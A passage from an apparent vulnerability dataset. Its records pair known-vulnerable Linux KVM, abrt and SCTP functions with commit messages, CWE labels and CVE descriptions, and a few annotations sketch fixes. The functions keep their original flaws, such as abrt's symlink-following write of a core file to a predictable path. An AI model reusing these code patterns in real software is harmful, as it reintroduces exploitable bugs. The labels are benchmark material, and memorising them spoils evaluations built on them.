Signed-off-by: Paolo Bonzini <pbonzini@redhat.com> | 1 | static void init_vmcb(struct vcpu_svm *svm)
{
struct vmcb_control_area *control = &svm->vmcb->control;
struct vmcb_save_area *save = &svm->vmcb->save;
svm->vcpu.fpu_active = 1;
svm->vcpu.arch.hflags = 0;
set_cr_intercept(svm, INTERCEPT_CR0_READ);
set_cr_intercept(svm, INTERCEPT_CR3_READ);
set_cr_intercept(svm, INTERCEPT_CR4_READ);
set_cr_intercept(svm, INTERCEPT_CR0_WRITE);
set_cr_intercept(svm, INTERCEPT_CR3_WRITE);
set_cr_intercept(svm, INTERCEPT_CR4_WRITE);
set_cr_intercept(svm, INTERCEPT_CR8_WRITE);
set_dr_intercepts(svm);
set_exception_intercept(svm, PF_VECTOR);
set_exception_intercept(svm, UD_VECTOR);
set_exception_intercept(svm, MC_VECTOR);
set_intercept(svm, INTERCEPT_INTR);
set_intercept(svm, INTERCEPT_NMI);
set_intercept(svm, INTERCEPT_SMI);
set_intercept(svm, INTERCEPT_SELECTIVE_CR0);
set_intercept(svm, INTERCEPT_RDPMC);
set_intercept(svm, INTERCEPT_CPUID);
set_intercept(svm, INTERCEPT_INVD);
set_intercept(svm, INTERCEPT_HLT);
set_intercept(svm, INTERCEPT_INVLPG);
set_intercept(svm, INTERCEPT_INVLPGA);
set_intercept(svm, INTERCEPT_IOIO_PROT);
set_intercept(svm, INTERCEPT_MSR_PROT);
set_intercept(svm, INTERCEPT_TASK_SWITCH);
set_intercept(svm, INTERCEPT_SHUTDOWN);
set_intercept(svm, INTERCEPT_VMRUN);
set_intercept(svm, INTERCEPT_VMMCALL);
set_intercept(svm, INTERCEPT_VMLOAD);
set_intercept(svm, INTERCEPT_VMSAVE);
set_intercept(svm, INTERCEPT_STGI);
set_intercept(svm, INTERCEPT_CLGI);
set_intercept(svm, INTERCEPT_SKINIT);
set_intercept(svm, INTERCEPT_WBINVD);
set_intercept(svm, INTERCEPT_MONITOR);
set_intercept(svm, INTERCEPT_MWAIT);
set_intercept(svm, INTERCEPT_XSETBV);
control->iopm_base_pa = iopm_base;
control->msrpm_base_pa = __pa(svm->msrpm);
control->int_ctl = V_INTR_MASKING_MASK;
init_seg(&save->es);
init_seg(&save->ss);
init_seg(&save->ds);
init_seg(&save->fs);
init_seg(&save->gs);
save->cs.selector = 0xf000;
save->cs.base = 0xffff0000;
/* Executable/Readable Code Segment */
save->cs.attrib = SVM_SELECTOR_READ_MASK | SVM_SELECTOR_P_MASK |
SVM_SELECTOR_S_MASK | SVM_SELECTOR_CODE_MASK;
save->cs.limit = 0xffff;
save->gdtr.limit = 0xffff;
save->idtr.limit = 0xffff;
init_sys_seg(&save->ldtr, SEG_TYPE_LDT);
init_sys_seg(&save->tr, SEG_TYPE_BUSY_TSS16);
svm_set_efer(&svm->vcpu, 0);
save->dr6 = 0xffff0ff0;
kvm_set_rflags(&svm->vcpu, 2);
save->rip = 0x0000fff0;
svm->vcpu.arch.regs[VCPU_REGS_RIP] = save->rip;
/*
* svm_set_cr0() sets PG and WP and clears NW and CD on save->cr0.
* It also updates the guest-visible cr0 value.
*/
svm_set_cr0(&svm->vcpu, X86_CR0_NW | X86_CR0_CD | X86_CR0_ET);
kvm_mmu_reset_context(&svm->vcpu);
save->cr4 = X86_CR4_PAE;
/* rdx = ?? */
if (npt_enabled) {
/* Setup VMCB for Nested Paging */
control->nested_ctl = 1;
clr_intercept(svm, INTERCEPT_INVLPG);
clr_exception_intercept(svm, PF_VECTOR);
clr_cr_intercept(svm, INTERCEPT_CR3_READ);
clr_cr_intercept(svm, INTERCEPT_CR3_WRITE);
save->g_pat = svm->vcpu.arch.pat;
save->cr3 = 0;
save->cr4 = 0;
}
svm->asid_generation = 0;
svm->nested.vmcb = 0;
svm->vcpu.arch.hflags = 0;
if (boot_cpu_has(X86_FEATURE_PAUSEFILTER)) {
control->pause_filter_count = 3000;
set_intercept(svm, INTERCEPT_PAUSE);
}
mark_all_dirty(svm->vmcb);
enable_gif(svm);
}
| 279,366,401,211,128,940,000,000,000,000,000,000,000 | svm.c | 46,777,106,013,319,800,000,000,000,000,000,000,000 | [
"CWE-399"
] | CVE-2015-5307 | The KVM subsystem in the Linux kernel through 4.2.6, and Xen 4.3.x through 4.6.x, allows guest OS users to cause a denial of service (host OS panic or hang) by triggering many #AC (aka Alignment Check) exceptions, related to svm.c and vmx.c. | https://nvd.nist.gov/vuln/detail/CVE-2015-5307 |
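The workaround intercepts #AC in init_vmcb() and reflects it straight back into the guest, so the microcode's #AC loop spins in guest context where the host still receives its timer interrupts. Sketch; registering the handler in the svm exit-handler table is omitted:

	set_exception_intercept(svm, AC_VECTOR);	/* added next to PF/UD/MC */

static int ac_interception(struct vcpu_svm *svm)
{
	/* Re-inject the alignment check exception into the guest. */
	kvm_queue_exception_e(&svm->vcpu, AC_VECTOR, 0);
	return 1;
}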
1,461 | abrt | 3c1b60cfa62d39e5fff5a53a5bc53dae189e740e | https://github.com/abrt/abrt | https://github.com/abrt/abrt/commit/3c1b60cfa62d39e5fff5a53a5bc53dae189e740e | ccpp: save abrt core files only to new files
Prior to this commit, abrt-hook-ccpp saved a core file generated by a
process running a program whose name starts with "abrt" in
DUMP_LOCATION/$(basename program)-coredump. If that file was a symlink,
the hook followed it and wrote the core file to the symlink's target.
Addresses CVE-2015-5287
Signed-off-by: Jakub Filak <jfilak@redhat.com> | 1 | int main(int argc, char** argv)
{
/* Kernel starts us with all fd's closed.
* But it's dangerous:
* fprintf(stderr) can dump messages into random fds, etc.
* Ensure that if any of fd 0,1,2 is closed, we open it to /dev/null.
*/
int fd = xopen("/dev/null", O_RDWR);
while (fd < 2)
fd = xdup(fd);
if (fd > 2)
close(fd);
int err = 1;
logmode = LOGMODE_JOURNAL;
/* Parse abrt.conf */
load_abrt_conf();
/* ... and plugins/CCpp.conf */
bool setting_MakeCompatCore;
bool setting_SaveBinaryImage;
bool setting_SaveFullCore;
bool setting_CreateCoreBacktrace;
bool setting_SaveContainerizedPackageData;
bool setting_StandaloneHook;
{
map_string_t *settings = new_map_string();
load_abrt_plugin_conf_file("CCpp.conf", settings);
const char *value;
value = get_map_string_item_or_NULL(settings, "MakeCompatCore");
setting_MakeCompatCore = value && string_to_bool(value);
value = get_map_string_item_or_NULL(settings, "SaveBinaryImage");
setting_SaveBinaryImage = value && string_to_bool(value);
value = get_map_string_item_or_NULL(settings, "SaveFullCore");
setting_SaveFullCore = value ? string_to_bool(value) : true;
value = get_map_string_item_or_NULL(settings, "CreateCoreBacktrace");
setting_CreateCoreBacktrace = value ? string_to_bool(value) : true;
value = get_map_string_item_or_NULL(settings, "SaveContainerizedPackageData");
setting_SaveContainerizedPackageData = value && string_to_bool(value);
/* Do not call abrt-action-save-package-data with process's root, if ExploreChroots is disabled. */
if (!g_settings_explorechroots)
{
if (setting_SaveContainerizedPackageData)
log_warning("Ignoring SaveContainerizedPackageData because ExploreChroots is disabled");
setting_SaveContainerizedPackageData = false;
}
value = get_map_string_item_or_NULL(settings, "StandaloneHook");
setting_StandaloneHook = value && string_to_bool(value);
value = get_map_string_item_or_NULL(settings, "VerboseLog");
if (value)
g_verbose = xatoi_positive(value);
free_map_string(settings);
}
if (argc == 2 && strcmp(argv[1], "--config-test"))
return test_configuration(setting_SaveFullCore, setting_CreateCoreBacktrace);
if (argc < 8)
{
/* percent specifier: %s %c %p %u %g %t %e %P %i*/
/* argv: [0] [1] [2] [3] [4] [5] [6] [7] [8] [9]*/
error_msg_and_die("Usage: %s SIGNO CORE_SIZE_LIMIT PID UID GID TIME BINARY_NAME GLOBAL_PID [TID]", argv[0]);
}
/* Not needed on 2.6.30.
* At least 2.6.18 has a bug where
* argv[1] = "SIGNO CORE_SIZE_LIMIT PID ..."
* argv[2] = "CORE_SIZE_LIMIT PID ..."
* and so on. Fixing it:
*/
if (strchr(argv[1], ' '))
{
int i;
for (i = 1; argv[i]; i++)
{
strchrnul(argv[i], ' ')[0] = '\0';
}
}
errno = 0;
const char* signal_str = argv[1];
int signal_no = xatoi_positive(signal_str);
off_t ulimit_c = strtoull(argv[2], NULL, 10);
if (ulimit_c < 0) /* unlimited? */
{
/* set to max possible >0 value */
ulimit_c = ~((off_t)1 << (sizeof(off_t)*8-1));
}
const char *pid_str = argv[3];
pid_t local_pid = xatoi_positive(argv[3]);
uid_t uid = xatoi_positive(argv[4]);
if (errno || local_pid <= 0)
{
perror_msg_and_die("PID '%s' or limit '%s' is bogus", argv[3], argv[2]);
}
{
char *s = xmalloc_fopen_fgetline_fclose(VAR_RUN"/abrt/saved_core_pattern");
/* If we have a saved pattern and it's not a "|PROG ARGS" thing... */
if (s && s[0] != '|')
core_basename = s;
else
free(s);
}
const char *global_pid_str = argv[8];
pid_t pid = xatoi_positive(argv[8]);
pid_t tid = -1;
const char *tid_str = argv[9];
if (tid_str)
{
tid = xatoi_positive(tid_str);
}
char path[PATH_MAX];
char *executable = get_executable(pid);
if (executable && strstr(executable, "/abrt-hook-ccpp"))
{
error_msg_and_die("PID %lu is '%s', not dumping it to avoid recursion",
(long)pid, executable);
}
user_pwd = get_cwd(pid); /* may be NULL on error */
log_notice("user_pwd:'%s'", user_pwd);
sprintf(path, "/proc/%lu/status", (long)pid);
char *proc_pid_status = xmalloc_xopen_read_close(path, /*maxsz:*/ NULL);
uid_t fsuid = uid;
uid_t tmp_fsuid = get_fsuid(proc_pid_status);
if (tmp_fsuid < 0)
perror_msg_and_die("Can't parse 'Uid: line' in /proc/%lu/status", (long)pid);
const int fsgid = get_fsgid(proc_pid_status);
if (fsgid < 0)
error_msg_and_die("Can't parse 'Gid: line' in /proc/%lu/status", (long)pid);
int suid_policy = dump_suid_policy();
if (tmp_fsuid != uid)
{
/* use root for suided apps unless it's explicitly set to UNSAFE */
fsuid = 0;
if (suid_policy == DUMP_SUID_UNSAFE)
fsuid = tmp_fsuid;
else
{
g_user_core_flags = O_EXCL;
g_need_nonrelative = 1;
}
}
/* Open a fd to compat coredump, if requested and is possible */
int user_core_fd = -1;
if (setting_MakeCompatCore && ulimit_c != 0)
/* note: checks "user_pwd == NULL" inside; updates core_basename */
user_core_fd = open_user_core(uid, fsuid, fsgid, pid, &argv[1]);
if (executable == NULL)
{
/* readlink on /proc/$PID/exe failed, don't create abrt dump dir */
error_msg("Can't read /proc/%lu/exe link", (long)pid);
return create_user_core(user_core_fd, pid, ulimit_c);
}
const char *signame = NULL;
if (!signal_is_fatal(signal_no, &signame))
return create_user_core(user_core_fd, pid, ulimit_c); // not a signal we care about
const int abrtd_running = daemon_is_ok();
if (!setting_StandaloneHook && !abrtd_running)
{
/* not an error, exit with exit code 0 */
log("abrtd is not running. If it crashed, "
"/proc/sys/kernel/core_pattern contains a stale value, "
"consider resetting it to 'core'"
);
return create_user_core(user_core_fd, pid, ulimit_c);
}
if (setting_StandaloneHook)
ensure_writable_dir(g_settings_dump_location, DEFAULT_DUMP_LOCATION_MODE, "abrt");
if (g_settings_nMaxCrashReportsSize > 0)
{
/* If free space is less than 1/4 of MaxCrashReportsSize... */
if (low_free_space(g_settings_nMaxCrashReportsSize, g_settings_dump_location))
return create_user_core(user_core_fd, pid, ulimit_c);
}
/* Check /var/tmp/abrt/last-ccpp marker, do not dump repeated crashes
* if they happen too often. Else, write new marker value.
*/
snprintf(path, sizeof(path), "%s/last-ccpp", g_settings_dump_location);
if (check_recent_crash_file(path, executable))
{
/* It is a repeating crash */
return create_user_core(user_core_fd, pid, ulimit_c);
}
const char *last_slash = strrchr(executable, '/');
if (last_slash && strncmp(++last_slash, "abrt", 4) == 0)
{
if (g_settings_debug_level == 0)
{
log_warning("Ignoring crash of %s (SIG%s).",
executable, signame ? signame : signal_str);
goto cleanup_and_exit;
}
/* If abrtd/abrt-foo crashes, we don't want to create a _directory_,
* since that can make new copy of abrtd to process it,
* and maybe crash again...
* Unlike dirs, mere files are ignored by abrtd.
*/
if (snprintf(path, sizeof(path), "%s/%s-coredump", g_settings_dump_location, last_slash) >= sizeof(path))
error_msg_and_die("Error saving '%s': truncated long file path", path);
int abrt_core_fd = xopen3(path, O_WRONLY | O_CREAT | O_TRUNC, 0600);
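/* CVE-2015-5287 is this open: O_CREAT|O_TRUNC follows a symlink planted at
 * DUMP_LOCATION/abrt*-coredump. Per the commit message above, the fix writes
 * only to brand-new files; a sketch of the hardened open (my reconstruction,
 * not the verbatim upstream diff):
 *
 *	unlink(path);
 *	abrt_core_fd = xopen3(path, O_WRONLY | O_CREAT | O_EXCL, 0600);
 */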
off_t core_size = copyfd_eof(STDIN_FILENO, abrt_core_fd, COPYFD_SPARSE);
if (core_size < 0 || fsync(abrt_core_fd) != 0)
{
unlink(path);
/* copyfd_eof logs the error including errno string,
* but it does not log file name */
error_msg_and_die("Error saving '%s'", path);
}
log_notice("Saved core dump of pid %lu (%s) to %s (%llu bytes)", (long)pid, executable, path, (long long)core_size);
err = 0;
goto cleanup_and_exit;
}
unsigned path_len = snprintf(path, sizeof(path), "%s/ccpp-%s-%lu.new",
g_settings_dump_location, iso_date_string(NULL), (long)pid);
if (path_len >= (sizeof(path) - sizeof("/"FILENAME_COREDUMP)))
{
return create_user_core(user_core_fd, pid, ulimit_c);
}
/* If you don't want to have fs owner as root then:
*
* - use fsuid instead of uid for fs owner, so we don't expose any
* sensitive information of suided app in /var/(tmp|spool)/abrt
*
* - use dd_create_skeleton() and dd_reset_ownership(), when you finish
* creating the new dump directory, to prevent the real owner from writing to
* the directory until the hook is done (avoid race conditions and defend
* against hard and symbolic link attacks)
*/
dd = dd_create(path, /*fs owner*/0, DEFAULT_DUMP_DIR_MODE);
if (dd)
{
char source_filename[sizeof("/proc/%lu/somewhat_long_name") + sizeof(long)*3];
int source_base_ofs = sprintf(source_filename, "/proc/%lu/root", (long)pid);
source_base_ofs -= strlen("root");
/* What's wrong on using /proc/[pid]/root every time ?*/
/* It creates os_info_in_root_dir for all crashes. */
char *rootdir = process_has_own_root(pid) ? get_rootdir(pid) : NULL;
/* Reading data from an arbitrary root directory is not secure. */
if (g_settings_explorechroots)
{
/* Yes, test 'rootdir' but use 'source_filename' because 'rootdir' can
* be '/' for a process with own namespace. 'source_filename' is /proc/[pid]/root. */
dd_create_basic_files(dd, fsuid, (rootdir != NULL) ? source_filename : NULL);
}
else
{
dd_create_basic_files(dd, fsuid, NULL);
}
char *dest_filename = concat_path_file(dd->dd_dirname, "also_somewhat_longish_name");
char *dest_base = strrchr(dest_filename, '/') + 1;
strcpy(source_filename + source_base_ofs, "maps");
dd_copy_file(dd, FILENAME_MAPS, source_filename);
strcpy(source_filename + source_base_ofs, "limits");
dd_copy_file(dd, FILENAME_LIMITS, source_filename);
strcpy(source_filename + source_base_ofs, "cgroup");
dd_copy_file(dd, FILENAME_CGROUP, source_filename);
strcpy(source_filename + source_base_ofs, "mountinfo");
dd_copy_file(dd, FILENAME_MOUNTINFO, source_filename);
strcpy(dest_base, FILENAME_OPEN_FDS);
strcpy(source_filename + source_base_ofs, "fd");
dump_fd_info_ext(dest_filename, source_filename, dd->dd_uid, dd->dd_gid);
strcpy(dest_base, FILENAME_NAMESPACES);
dump_namespace_diff_ext(dest_filename, 1, pid, dd->dd_uid, dd->dd_gid);
free(dest_filename);
char *tmp = NULL;
get_env_variable(pid, "container", &tmp);
if (tmp != NULL)
{
dd_save_text(dd, FILENAME_CONTAINER, tmp);
free(tmp);
tmp = NULL;
}
get_env_variable(pid, "container_uuid", &tmp);
if (tmp != NULL)
{
dd_save_text(dd, FILENAME_CONTAINER_UUID, tmp);
free(tmp);
}
/* There's no need to compare mount namespaces and search for '/' in
* mountifo. Comparison of inodes of '/proc/[pid]/root' and '/' works
* fine. If those inodes do not equal each other, we have to verify
* that '/proc/[pid]/root' is not a symlink to a chroot.
*/
const int containerized = (rootdir != NULL && strcmp(rootdir, "/") == 0);
if (containerized)
{
log_debug("Process %d is considered to be containerized", pid);
pid_t container_pid;
if (get_pid_of_container(pid, &container_pid) == 0)
{
char *container_cmdline = get_cmdline(container_pid);
dd_save_text(dd, FILENAME_CONTAINER_CMDLINE, container_cmdline);
free(container_cmdline);
}
}
dd_save_text(dd, FILENAME_ANALYZER, "abrt-ccpp");
dd_save_text(dd, FILENAME_TYPE, "CCpp");
dd_save_text(dd, FILENAME_EXECUTABLE, executable);
dd_save_text(dd, FILENAME_PID, pid_str);
dd_save_text(dd, FILENAME_GLOBAL_PID, global_pid_str);
dd_save_text(dd, FILENAME_PROC_PID_STATUS, proc_pid_status);
if (user_pwd)
dd_save_text(dd, FILENAME_PWD, user_pwd);
if (tid_str)
dd_save_text(dd, FILENAME_TID, tid_str);
if (rootdir)
{
if (strcmp(rootdir, "/") != 0)
dd_save_text(dd, FILENAME_ROOTDIR, rootdir);
}
free(rootdir);
char *reason = xasprintf("%s killed by SIG%s",
last_slash, signame ? signame : signal_str);
dd_save_text(dd, FILENAME_REASON, reason);
free(reason);
char *cmdline = get_cmdline(pid);
dd_save_text(dd, FILENAME_CMDLINE, cmdline ? : "");
free(cmdline);
char *environ = get_environ(pid);
dd_save_text(dd, FILENAME_ENVIRON, environ ? : "");
free(environ);
char *fips_enabled = xmalloc_fopen_fgetline_fclose("/proc/sys/crypto/fips_enabled");
if (fips_enabled)
{
if (strcmp(fips_enabled, "0") != 0)
dd_save_text(dd, "fips_enabled", fips_enabled);
free(fips_enabled);
}
dd_save_text(dd, FILENAME_ABRT_VERSION, VERSION);
/* In case of errors, treat the process as if it has locked memory */
long unsigned lck_bytes = ULONG_MAX;
const char *vmlck = strstr(proc_pid_status, "VmLck:");
if (vmlck == NULL)
error_msg("/proc/%s/status does not contain 'VmLck:' line", pid_str);
else if (1 != sscanf(vmlck + 6, "%lu kB\n", &lck_bytes))
error_msg("Failed to parse 'VmLck:' line in /proc/%s/status", pid_str);
if (lck_bytes)
{
log_notice("Process %s of user %lu has locked memory",
pid_str, (long unsigned)uid);
dd_mark_as_notreportable(dd, "The process had locked memory "
"which usually indicates efforts to protect sensitive "
"data (passwords) from being written to disk.\n"
"In order to avoid sensitive information leakages, "
"ABRT will not allow you to report this problem to "
"bug tracking tools");
}
if (setting_SaveBinaryImage)
{
if (save_crashing_binary(pid, dd))
{
error_msg("Error saving '%s'", path);
goto cleanup_and_exit;
}
}
off_t core_size = 0;
if (setting_SaveFullCore)
{
strcpy(path + path_len, "/"FILENAME_COREDUMP);
int abrt_core_fd = create_or_die(path, user_core_fd);
/* We write both coredumps at once.
* We can't write user coredump first, since it might be truncated
* and thus can't be copied and used as abrt coredump;
* and if we write abrt coredump first and then copy it as user one,
* then we have a race when process exits but coredump does not exist yet:
* $ echo -e '#include<signal.h>\nmain(){raise(SIGSEGV);}' | gcc -o test -x c -
* $ rm -f core*; ulimit -c unlimited; ./test; ls -l core*
* 21631 Segmentation fault (core dumped) ./test
* ls: cannot access core*: No such file or directory <=== BAD
*/
core_size = copyfd_sparse(STDIN_FILENO, abrt_core_fd, user_core_fd, ulimit_c);
close_user_core(user_core_fd, core_size);
if (fsync(abrt_core_fd) != 0 || close(abrt_core_fd) != 0 || core_size < 0)
{
unlink(path);
/* copyfd_sparse logs the error including errno string,
* but it does not log file name */
error_msg("Error writing '%s'", path);
goto cleanup_and_exit;
}
}
else
{
/* User core is created even if WriteFullCore is off. */
create_user_core(user_core_fd, pid, ulimit_c);
}
/* User core is either written or closed */
user_core_fd = -1;
/*
* ! No other errors should cause removal of the user core !
*/
/* Because of #1211835 and #1126850 */
#if 0
/* Save JVM crash log if it exists. (JVM's coredump per se
* is nearly useless for JVM developers)
*/
{
char *java_log = xasprintf("/tmp/jvm-%lu/hs_error.log", (long)pid);
int src_fd = open(java_log, O_RDONLY);
free(java_log);
/* If we couldn't open the error log in /tmp directory we can try to
* read the log from the current directory. It may produce AVC, it
* may produce some error log but all these are expected.
*/
if (src_fd < 0)
{
java_log = xasprintf("%s/hs_err_pid%lu.log", user_pwd, (long)pid);
src_fd = open(java_log, O_RDONLY);
free(java_log);
}
if (src_fd >= 0)
{
strcpy(path + path_len, "/hs_err.log");
int dst_fd = create_or_die(path, user_core_fd);
off_t sz = copyfd_eof(src_fd, dst_fd, COPYFD_SPARSE);
if (close(dst_fd) != 0 || sz < 0)
{
error_msg("Error saving '%s'", path);
goto cleanup_and_exit;
}
close(src_fd);
}
}
#endif
/* Perform crash-time unwind of the guilty thread. */
if (tid > 0 && setting_CreateCoreBacktrace)
create_core_backtrace(tid, executable, signal_no, dd);
/* We close dumpdir before we start catering for crash storm case.
* Otherwise, delete_dump_dir's from other concurrent
* CCpp's won't be able to delete our dump (their delete_dump_dir
* will wait for us), and we won't be able to delete their dumps.
* Classic deadlock.
*/
dd_close(dd);
dd = NULL;
path[path_len] = '\0'; /* path now contains only directory name */
if (abrtd_running && setting_SaveContainerizedPackageData && containerized)
{ /* Do we really need to run rpm from core_pattern hook? */
sprintf(source_filename, "/proc/%lu/root", (long)pid);
const char *cmd_args[6];
cmd_args[0] = BIN_DIR"/abrt-action-save-package-data";
cmd_args[1] = "-d";
cmd_args[2] = path;
cmd_args[3] = "-r";
cmd_args[4] = source_filename;
cmd_args[5] = NULL;
pid_t pid = fork_execv_on_steroids(0, (char **)cmd_args, NULL, NULL, path, 0);
int stat;
safe_waitpid(pid, &stat, 0);
}
char *newpath = xstrndup(path, path_len - (sizeof(".new")-1));
if (rename(path, newpath) == 0)
strcpy(path, newpath);
free(newpath);
if (core_size > 0)
log_notice("Saved core dump of pid %lu (%s) to %s (%llu bytes)",
(long)pid, executable, path, (long long)core_size);
if (abrtd_running)
notify_new_path(path);
/* rhbz#539551: "abrt going crazy when crashing process is respawned" */
if (g_settings_nMaxCrashReportsSize > 0)
{
/* x1.25 and round up to 64m: go a bit up, so that usual in-daemon trimming
* kicks in first, and we don't "fight" with it:
*/
unsigned maxsize = g_settings_nMaxCrashReportsSize + g_settings_nMaxCrashReportsSize / 4;
maxsize |= 63;
trim_problem_dirs(g_settings_dump_location, maxsize * (double)(1024*1024), path);
}
err = 0;
}
else
{
/* We didn't create abrt dump, but may need to create compat coredump */
return create_user_core(user_core_fd, pid, ulimit_c);
}
cleanup_and_exit:
if (dd)
dd_delete(dd);
if (user_core_fd >= 0)
unlinkat(dirfd(proc_cwd), core_basename, /*only files*/0);
if (proc_cwd != NULL)
closedir(proc_cwd);
return err;
}
| 287,347,886,890,565,600,000,000,000,000,000,000,000 | None | null | [
"CWE-59"
] | CVE-2015-5287 | The abrt-hook-ccpp help program in Automatic Bug Reporting Tool (ABRT) before 2.7.1 allows local users with certain permissions to gain privileges via a symlink attack on a file with a predictable name, as demonstrated by /var/tmp/abrt/abrt-hax-coredump or /var/spool/abrt/abrt-hax-coredump. | https://nvd.nist.gov/vuln/detail/CVE-2015-5287 |
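The weakness in the record above is a privileged helper creating files at names a local attacker can predict (per the CVE description, e.g. /var/tmp/abrt/abrt-hax-coredump), so a pre-planted file or symlink gets used. A minimal user-space sketch of the defensive open pattern, assuming only POSIX open(2) semantics — this is not the actual abrt patch:

#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>

/* Refuse to reuse anything already at 'path': with O_CREAT|O_EXCL the
 * open fails if the name exists at all, including as a (possibly
 * dangling) symlink, and O_NOFOLLOW is kept as a second guard. */
static int create_exclusive(const char *path)
{
    int fd = open(path, O_WRONLY | O_CREAT | O_EXCL | O_NOFOLLOW, 0600);
    if (fd < 0) {
        perror(path);           /* EEXIST/ELOOP: something was planted */
        exit(EXIT_FAILURE);
    }
    return fd;
}

With this pattern the helper aborts instead of writing through attacker-controlled state, rather than trusting a predictable path the way the create_or_die() calls in the function above do.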
1,463 | linux | 8e2d61e0aed2b7c4ecb35844fe07e0b2b762dee4 | https://github.com/torvalds/linux | https://github.com/torvalds/linux/commit/8e2d61e0aed2b7c4ecb35844fe07e0b2b762dee4 | sctp: fix race on protocol/netns initialization
Consider sctp module is unloaded and is being requested because an user
is creating a sctp socket.
During initialization, sctp will add the new protocol type and then
initialize pernet subsys:
status = sctp_v4_protosw_init();
if (status)
goto err_protosw_init;
status = sctp_v6_protosw_init();
if (status)
goto err_v6_protosw_init;
status = register_pernet_subsys(&sctp_net_ops);
The problem is that after those calls to sctp_v{4,6}_protosw_init(), it
is possible for userspace to create SCTP sockets as if the module were
already fully loaded. If that happens, one of the possible effects is
that we will have readers of net->sctp.local_addr_list earlier
than expected and sctp_net_init() does not take precautions while
dealing with that list, leading to a potential panic but not limited to
that, as sctp_sock_init() will copy a bunch of blank/partially
initialized values from net->sctp.
The race happens like this:
CPU 0 | CPU 1
socket() |
__sock_create | socket()
inet_create | __sock_create
list_for_each_entry_rcu( |
answer, &inetsw[sock->type], |
list) { | inet_create
/* no hits */ |
if (unlikely(err)) { |
... |
request_module() |
/* socket creation is blocked |
* the module is fully loaded |
*/ |
sctp_init |
sctp_v4_protosw_init |
inet_register_protosw |
list_add_rcu(&p->list, |
last_perm); |
| list_for_each_entry_rcu(
| answer, &inetsw[sock->type],
sctp_v6_protosw_init | list) {
| /* hit, so assumes protocol
| * is already loaded
| */
| /* socket creation continues
| * before netns is initialized
| */
register_pernet_subsys |
Simply inverting the initialization order between
register_pernet_subsys() and sctp_v4_protosw_init() is not possible
because register_pernet_subsys() will create a control sctp socket, so
the protocol must be already visible by then. Deferring the socket
creation to a work-queue is not good, especially because we lose the
ability to handle its errors.
So, as suggested by Vlad, the fix is to split netns initialization into
two stages, defaults and control socket, so that the defaults are
already loaded by the time we register the protocol, while control-socket
initialization is kept at the same point it is today.
Fixes: 4db67e808640 ("sctp: Make the address lists per network namespace")
Signed-off-by: Vlad Yasevich <vyasevich@gmail.com>
Signed-off-by: Marcelo Ricardo Leitner <marcelo.leitner@gmail.com>
Signed-off-by: David S. Miller <davem@davemloft.net> | 1 | static __init int sctp_init(void)
{
int i;
int status = -EINVAL;
unsigned long goal;
unsigned long limit;
int max_share;
int order;
sock_skb_cb_check_size(sizeof(struct sctp_ulpevent));
/* Allocate bind_bucket and chunk caches. */
status = -ENOBUFS;
sctp_bucket_cachep = kmem_cache_create("sctp_bind_bucket",
sizeof(struct sctp_bind_bucket),
0, SLAB_HWCACHE_ALIGN,
NULL);
if (!sctp_bucket_cachep)
goto out;
sctp_chunk_cachep = kmem_cache_create("sctp_chunk",
sizeof(struct sctp_chunk),
0, SLAB_HWCACHE_ALIGN,
NULL);
if (!sctp_chunk_cachep)
goto err_chunk_cachep;
status = percpu_counter_init(&sctp_sockets_allocated, 0, GFP_KERNEL);
if (status)
goto err_percpu_counter_init;
/* Implementation specific variables. */
/* Initialize default stream count setup information. */
sctp_max_instreams = SCTP_DEFAULT_INSTREAMS;
sctp_max_outstreams = SCTP_DEFAULT_OUTSTREAMS;
/* Initialize handle used for association ids. */
idr_init(&sctp_assocs_id);
limit = nr_free_buffer_pages() / 8;
limit = max(limit, 128UL);
sysctl_sctp_mem[0] = limit / 4 * 3;
sysctl_sctp_mem[1] = limit;
sysctl_sctp_mem[2] = sysctl_sctp_mem[0] * 2;
/* Set per-socket limits to no more than 1/128 the pressure threshold*/
limit = (sysctl_sctp_mem[1]) << (PAGE_SHIFT - 7);
max_share = min(4UL*1024*1024, limit);
sysctl_sctp_rmem[0] = SK_MEM_QUANTUM; /* give each asoc 1 page min */
sysctl_sctp_rmem[1] = 1500 * SKB_TRUESIZE(1);
sysctl_sctp_rmem[2] = max(sysctl_sctp_rmem[1], max_share);
sysctl_sctp_wmem[0] = SK_MEM_QUANTUM;
sysctl_sctp_wmem[1] = 16*1024;
sysctl_sctp_wmem[2] = max(64*1024, max_share);
/* Size and allocate the association hash table.
* The methodology is similar to that of the tcp hash tables.
*/
if (totalram_pages >= (128 * 1024))
goal = totalram_pages >> (22 - PAGE_SHIFT);
else
goal = totalram_pages >> (24 - PAGE_SHIFT);
for (order = 0; (1UL << order) < goal; order++)
;
do {
sctp_assoc_hashsize = (1UL << order) * PAGE_SIZE /
sizeof(struct sctp_hashbucket);
if ((sctp_assoc_hashsize > (64 * 1024)) && order > 0)
continue;
sctp_assoc_hashtable = (struct sctp_hashbucket *)
__get_free_pages(GFP_ATOMIC|__GFP_NOWARN, order);
} while (!sctp_assoc_hashtable && --order > 0);
if (!sctp_assoc_hashtable) {
pr_err("Failed association hash alloc\n");
status = -ENOMEM;
goto err_ahash_alloc;
}
for (i = 0; i < sctp_assoc_hashsize; i++) {
rwlock_init(&sctp_assoc_hashtable[i].lock);
INIT_HLIST_HEAD(&sctp_assoc_hashtable[i].chain);
}
/* Allocate and initialize the endpoint hash table. */
sctp_ep_hashsize = 64;
sctp_ep_hashtable =
kmalloc(64 * sizeof(struct sctp_hashbucket), GFP_KERNEL);
if (!sctp_ep_hashtable) {
pr_err("Failed endpoint_hash alloc\n");
status = -ENOMEM;
goto err_ehash_alloc;
}
for (i = 0; i < sctp_ep_hashsize; i++) {
rwlock_init(&sctp_ep_hashtable[i].lock);
INIT_HLIST_HEAD(&sctp_ep_hashtable[i].chain);
}
/* Allocate and initialize the SCTP port hash table. */
do {
sctp_port_hashsize = (1UL << order) * PAGE_SIZE /
sizeof(struct sctp_bind_hashbucket);
if ((sctp_port_hashsize > (64 * 1024)) && order > 0)
continue;
sctp_port_hashtable = (struct sctp_bind_hashbucket *)
__get_free_pages(GFP_ATOMIC|__GFP_NOWARN, order);
} while (!sctp_port_hashtable && --order > 0);
if (!sctp_port_hashtable) {
pr_err("Failed bind hash alloc\n");
status = -ENOMEM;
goto err_bhash_alloc;
}
for (i = 0; i < sctp_port_hashsize; i++) {
spin_lock_init(&sctp_port_hashtable[i].lock);
INIT_HLIST_HEAD(&sctp_port_hashtable[i].chain);
}
pr_info("Hash tables configured (established %d bind %d)\n",
sctp_assoc_hashsize, sctp_port_hashsize);
sctp_sysctl_register();
